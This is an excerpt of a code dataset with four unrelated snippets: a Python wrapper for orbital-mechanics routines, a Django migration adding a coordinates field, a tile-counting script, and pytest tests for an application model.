4,896 | ccd32a6ca98c205a6f5d4936288392251522db29 | # -*- coding: utf-8 -*-
__all__ = ["kepler", "quad_solution_vector", "contact_points"]
import numpy as np
from .. import driver
def kepler(mean_anomaly, eccentricity):
    """Solve Kepler's equation via the compiled driver.

    Returns (sinf, cosf): sine and cosine arrays matching the shape of
    mean_anomaly. Inputs are made contiguous float64 for the driver.
    """
    M = np.ascontiguousarray(mean_anomaly, dtype=np.float64)
    ecc = np.ascontiguousarray(eccentricity, dtype=np.float64)
    sinf, cosf = np.empty_like(M), np.empty_like(M)
    driver.solve_kepler(M, ecc, sinf, cosf)
    return sinf, cosf
def quad_solution_vector(b, r):
    """Compute the quadratic solution vector via the compiled driver.

    Returns an array of shape r.shape + (3,): one length-3 solution vector
    per input element. Inputs are made contiguous float64 for the driver.
    """
    impact = np.ascontiguousarray(b, dtype=np.float64)
    radius = np.ascontiguousarray(r, dtype=np.float64)
    out = np.empty(radius.shape + (3,), dtype=np.float64)
    driver.quad_solution_vector(impact, radius, out)
    return out
def contact_points(a, e, cosw, sinw, cosi, sini, L):
    """Compute contact points via the compiled driver.

    Returns (M_left, M_right, flag): two float64 output arrays shaped like
    `a` plus a per-element int32 status flag from the solver.
    """
    # The compiled driver requires contiguous float64 input buffers.
    inputs = [np.ascontiguousarray(v, dtype=np.float64)
              for v in (a, e, cosw, sinw, cosi, sini, L)]
    M_left = np.empty_like(inputs[0])
    M_right = np.empty_like(inputs[0])
    flag = np.empty_like(inputs[0], dtype=np.int32)
    driver.contact_points(*inputs, M_left, M_right, flag)
    return M_left, M_right, flag
|
4,897 | 9af71eaf8f6f4daacdc1def7b8c5b29e6bac6b46 | # Generated by Django 2.2.6 on 2019-12-08 22:18
import django.contrib.gis.db.models.fields
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add a geographic `coordinates` field to Company and widen `founded_at`.

    Auto-generated migration; do not edit the operations by hand unless the
    migration graph is rebuilt accordingly.
    """

    dependencies = [
        ('backend', '0001_initial'),
    ]

    operations = [
        # Optional WGS84 (srid=4326) point locating the company.
        migrations.AddField(
            model_name='company',
            name='coordinates',
            field=django.contrib.gis.db.models.fields.PointField(blank=True, null=True, srid=4326),
        ),
        # founded_at becomes a plain integer (e.g. a year value -- confirm
        # against the model definition).
        migrations.AlterField(
            model_name='company',
            name='founded_at',
            field=models.IntegerField(),
        ),
    ]
|
4,898 | 6c426d2b165e01a7cec9f7ddbd96113ae05668f6 | import math
# Cover an n x m rectangle with a x a tiles: tiles may overhang but not be cut.
n, m, a = map(int, input().split())
# Integer ceiling division avoids float rounding: math.ceil(n/a) can be off
# by one once n/a exceeds double precision for very large inputs.
rows = (n + a - 1) // a
cols = (m + a - 1) // a
print(rows * cols)
|
4,899 | f4df7688ed927e1788ada0ef11f528eab5a52282 | import pytest
from mine.models import Application
class TestApplication:
    """Unit tests for the application class."""

    # Shared fixture instances, built once at class-definition time.
    app1 = Application("iTunes")
    app1.versions.mac = "iTunes.app"
    app2 = Application("HipChat")
    app3 = Application("Sublime Text")
    app3.versions.linux = "sublime_text"
    app4 = Application("hipchat")

    # (expected string, application) pairs for the parametrized __str__ test.
    str_application = [
        ("iTunes", app1),
        ("HipChat", app2),
        ("Sublime Text", app3),
        ("hipchat", app4),
    ]

    @pytest.mark.parametrize("string,application", str_application)
    def test_str(self, string, application):
        """Verify applications can be converted to strings."""
        assert string == str(application)

    def test_eq(self):
        """Verify applications can be equated."""
        # "HipChat" == "hipchat": equality is presumably case-insensitive on
        # the name -- confirm against mine.models.Application.
        assert self.app2 == self.app4
        assert self.app1 != self.app3

    def test_lt(self):
        """Verify applications can be sorted."""
        assert self.app2 < self.app1
        assert self.app3 > self.app2
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.